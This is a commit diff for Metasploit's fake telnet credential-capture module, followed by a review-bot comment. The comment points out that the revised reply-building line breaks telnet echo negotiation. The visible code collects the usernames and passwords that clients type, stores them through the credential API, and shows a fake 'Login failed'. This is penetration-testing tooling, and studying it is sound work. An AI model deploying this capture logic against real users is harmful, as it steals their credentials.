Land #5546, Use the new cred API for auxiliary/server/capture/telnet
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
|
||||
OptPort.new('SRVPORT', [true, 'The local port to listen on.', 23]),
|
||||
OptString.new('BANNER', [false, 'The server banner to display when client connects'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@@ -39,6 +40,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@state = {}
|
||||
end
|
||||
|
||||
def banner
|
||||
datastore['BANNER'] || 'Welcome'
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
|
||||
exploit()
|
||||
@@ -59,7 +64,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def on_client_data(c)
|
||||
data = c.get_once
|
||||
|
||||
return if not data
|
||||
|
||||
offset = 0
|
||||
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# except for echoing which we WILL control for
|
||||
# the password
|
||||
|
||||
reply = "\xffX#{data[x + 2].chr}"
|
||||
reply = "\xff#{data[x + 2].chr}"
|
||||
|
||||
if @state[c][:pass] and data[x + 2] == 0x01
|
||||
reply[1] = "\xfb"
|
||||
@@ -89,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
if not @state[c][:started]
|
||||
c.put "\r\nWelcome.\r\n\r\n"
|
||||
c.put "\r\n#{banner}\r\n\r\n"
|
||||
@state[c][:started] = true
|
||||
end
|
||||
|
||||
@@ -106,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if not @state[c][:gotuser]
|
||||
@state[c][:user] = data.strip
|
||||
@state[c][:gotuser] = true
|
||||
c.put "\xff\xfb\x01" # WILL ECHO
|
||||
c.put "\xff\xfc\x01" # WON'T ECHO
|
||||
end
|
||||
|
||||
if @state[c][:pass].nil?
|
||||
@@ -121,23 +125,43 @@ class Metasploit3 < Msf::Auxiliary
|
||||
c.put "\x00\r\n"
|
||||
end
|
||||
|
||||
report_auth_info(
|
||||
:host => @state[c][:ip],
|
||||
:port => datastore['SRVPORT'],
|
||||
:sname => 'telnet',
|
||||
:user => @state[c][:user],
|
||||
:pass => @state[c][:pass],
|
||||
:source_type => "captured",
|
||||
:active => true
|
||||
)
|
||||
|
||||
print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
|
||||
|
||||
c.put "\r\nLogin failed\r\n\r\n"
|
||||
|
||||
report_cred(
|
||||
ip: @state[c][:ip],
|
||||
port: datastore['SRVPORT'],
|
||||
service_name: 'telnet',
|
||||
user: @state[c][:user],
|
||||
password: @state[c][:pass]
|
||||
)
|
||||
c.close
|
||||
end
|
||||
|
||||
def report_cred(opts)
|
||||
service_data = {
|
||||
address: opts[:ip],
|
||||
port: opts[:port],
|
||||
service_name: opts[:service_name],
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: fullname,
|
||||
username: opts[:user],
|
||||
private_data: opts[:password],
|
||||
private_type: :password
|
||||
}.merge(service_data)
|
||||
|
||||
login_data = {
|
||||
core: create_credential(credential_data),
|
||||
status: Metasploit::Model::Login::Status::UNTRIED,
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def on_client_close(c)
|
||||
@state.delete(c)
|
||||
end
|
||||
|
||||
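Review bot: In `on_client_data`, `reply = "\xff#{data[x + 2].chr}"` builds a two-byte string, yet the following lines still set `reply[1] = "\xfb"`, so the assignment replaces the option byte rather than a command placeholder. This assumes the second printed `reply =` line is the new side, since the `+`/`-` markers did not survive on this page. The reply would then be IAC plus a command with no option code, and the echo negotiation that the comment above describes for the password prompt would not take effect as intended. Keeping the placeholder, `reply = "\xffX#{data[x + 2].chr}"`, or choosing the command byte first and building the string afterwards, avoids it. The body of `on_client_data` starts and ends outside the visible hunks, so any other branches that write `reply[1]` should be checked as well.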